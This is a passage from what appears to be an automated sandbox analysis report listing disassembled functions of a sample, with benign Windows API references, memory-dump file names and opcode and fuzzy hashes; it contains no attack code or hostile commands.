                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f0f6380ae81f123bac63ae83702235446b9ff79560d11937ceccf043547ca76a
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: f0f6380ae81f123bac63ae83702235446b9ff79560d11937ceccf043547ca76a
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              Function 00E84B7B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7c2ad7b56165b876a6e8c2ab069f80e78cdc44fe128cc7a9788a1f32cf31c544
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: 7c2ad7b56165b876a6e8c2ab069f80e78cdc44fe128cc7a9788a1f32cf31c544
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              Function 00E84B71 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4f684d22ad79a3c201ca20d678b40fc191cf58ef7c8a71d3d300be4f04836bbc
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: 4f684d22ad79a3c201ca20d678b40fc191cf58ef7c8a71d3d300be4f04836bbc
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              Function 00E84B49 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ba86cdec677a4189b94c9e73108b05df5b74b101fe7537a3901bcb83ea52265b
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: ba86cdec677a4189b94c9e73108b05df5b74b101fe7537a3901bcb83ea52265b
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              Function 00E84B53 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 87ee575212ea8a4981b0483caf15171ff4a062e66bcb27ed41c38cedc02719bb
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: 87ee575212ea8a4981b0483caf15171ff4a062e66bcb27ed41c38cedc02719bb
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              Function 00E84B2E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: eaf2d1b1c6a9fc79dfa97a86a4a05099f2b558115291ce95f5ab5c6d37273b84
                                                                                              • Instruction ID: de4cf87de48af5e620735c3a7ae9e1135110f30a8955a9b8ed1f5db8f9d761c7
                                                                                              • Opcode Fuzzy Hash: eaf2d1b1c6a9fc79dfa97a86a4a05099f2b558115291ce95f5ab5c6d37273b84
                                                                                              • Instruction Fuzzy Hash: 15A001E62AD222BC3108B256AE07E7B129DC8D6B21331B61EF54DF90E6A89469851631
                                                                                              Function 00E84CE4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f3c4d1d53ec4fe67fd148476d6923c3361da2f0c7fae21bbafcfe54d9bfc29bb
                                                                                              • Instruction ID: 8b5d23cbe215a66db79272f83032542bd72b7840d654c9d8ff8bdfc534e578ba
                                                                                              • Opcode Fuzzy Hash: f3c4d1d53ec4fe67fd148476d6923c3361da2f0c7fae21bbafcfe54d9bfc29bb
                                                                                              • Instruction Fuzzy Hash: 63A011CA3AEA23BC3008B280AE02C3A020CC0C2B20330B20EF00CF80C2A88028880230
                                                                                              Function 00E84CFF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c512f960de307c82519ceb7bebda6961cacafb13f2052faea224274a2e0d652f
                                                                                              • Instruction ID: 610cd0b7ca7809619f9d3596d90153d054124965a4b02cb56f8ef906c64d9cdd
                                                                                              • Opcode Fuzzy Hash: c512f960de307c82519ceb7bebda6961cacafb13f2052faea224274a2e0d652f
                                                                                              • Instruction Fuzzy Hash: 79A024C735D5137C300471405D03C37010CC0C5F10330750DF00DF40C154401C440130
                                                                                              Function 00E84CC6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 325a1a159994dac7990a21aee7027e127efc7f9870614325b553da8396288e42
                                                                                              • Instruction ID: 7e791159fee8fb7a8b3d3361d2dfe37f5389e859228c130107644bf4e94bf02e
                                                                                              • Opcode Fuzzy Hash: 325a1a159994dac7990a21aee7027e127efc7f9870614325b553da8396288e42
                                                                                              • Instruction Fuzzy Hash: 64A002D625D117BC310471515D06D76415DC4C5B51332751DF54DF54D1544418451531
                                                                                              Function 00E84CDA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3b787e294bbf59494b98db971708f579ee6f464219050e6d958f9ea8381bfe88
                                                                                              • Instruction ID: 7e791159fee8fb7a8b3d3361d2dfe37f5389e859228c130107644bf4e94bf02e
                                                                                              • Opcode Fuzzy Hash: 3b787e294bbf59494b98db971708f579ee6f464219050e6d958f9ea8381bfe88
                                                                                              • Instruction Fuzzy Hash: 64A002D625D117BC310471515D06D76415DC4C5B51332751DF54DF54D1544418451531
                                                                                              Function 00E84CD0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 06e0abae225484fbca9b5d8577180eab9cb437377c51001685d3c5bd49c60b8a
                                                                                              • Instruction ID: 7e791159fee8fb7a8b3d3361d2dfe37f5389e859228c130107644bf4e94bf02e
                                                                                              • Opcode Fuzzy Hash: 06e0abae225484fbca9b5d8577180eab9cb437377c51001685d3c5bd49c60b8a
                                                                                              • Instruction Fuzzy Hash: 64A002D625D117BC310471515D06D76415DC4C5B51332751DF54DF54D1544418451531
                                                                                              Function 00E84CA8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3537856c9ff86717bd07d10291209ba9ccb385f97796aeaa907cdee06bc73a98
                                                                                              • Instruction ID: 7e791159fee8fb7a8b3d3361d2dfe37f5389e859228c130107644bf4e94bf02e
                                                                                              • Opcode Fuzzy Hash: 3537856c9ff86717bd07d10291209ba9ccb385f97796aeaa907cdee06bc73a98
                                                                                              • Instruction Fuzzy Hash: 64A002D625D117BC310471515D06D76415DC4C5B51332751DF54DF54D1544418451531
                                                                                              Function 00E61DE7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetDlgItemTextW.USER32(?,?,?), ref: 00E61DFC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText
                                                                                              • String ID:
                                                                                              • API String ID: 3367045223-0
                                                                                              • Opcode ID: f124e6372640b15a096ddac77e83279c8c69ec866ceae74f620ab12ffa9e5756
                                                                                              • Instruction ID: 6cd8c722acc3030d0896927b1cb9aac4ecbccfbc1e2e14d8280f4697159e7c57
                                                                                              • Opcode Fuzzy Hash: f124e6372640b15a096ddac77e83279c8c69ec866ceae74f620ab12ffa9e5756
                                                                                              • Instruction Fuzzy Hash: 8BC00271509240FFCB05CF58E948D1BBBB6FB95316F51D558F19496030C331D924DB62
                                                                                              Function 00E84D13 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 6566288d4c4d8fd0cd16530cd0125fe6105c6abfafd7e34930dc4716bf48c082
                                                                                              • Instruction ID: 610cd0b7ca7809619f9d3596d90153d054124965a4b02cb56f8ef906c64d9cdd
                                                                                              • Opcode Fuzzy Hash: 6566288d4c4d8fd0cd16530cd0125fe6105c6abfafd7e34930dc4716bf48c082
                                                                                              • Instruction Fuzzy Hash: 79A024C735D5137C300471405D03C37010CC0C5F10330750DF00DF40C154401C440130
                                                                                              Function 00E6E8D9 Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,00E6D115,?,?,?,?,?,?,?), ref: 00E6E8DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              • Opcode ID: 056ecbe3433907c1f92e77b83ca7f48e709c79e31d5643021b46fcacfdfe3d8b
                                                                                              • Instruction ID: 702c5ea35ef3a72443674203b6999d65d7ca4ef9a6a0f5a1050ba378451efb6c
                                                                                              • Opcode Fuzzy Hash: 056ecbe3433907c1f92e77b83ca7f48e709c79e31d5643021b46fcacfdfe3d8b
                                                                                              • Instruction Fuzzy Hash: 0EA00230201145CFDB412F33DE0970E7B6ABF426D9B69C0AAA409D9071DB27CCB7EA41
                                                                                              Function 00E6DE50 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(?,?,00000001,00E6DE10,522FB702,?,00000000,00E993B1,000000FF,?,00E6BEA6,?), ref: 00E6DE6B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
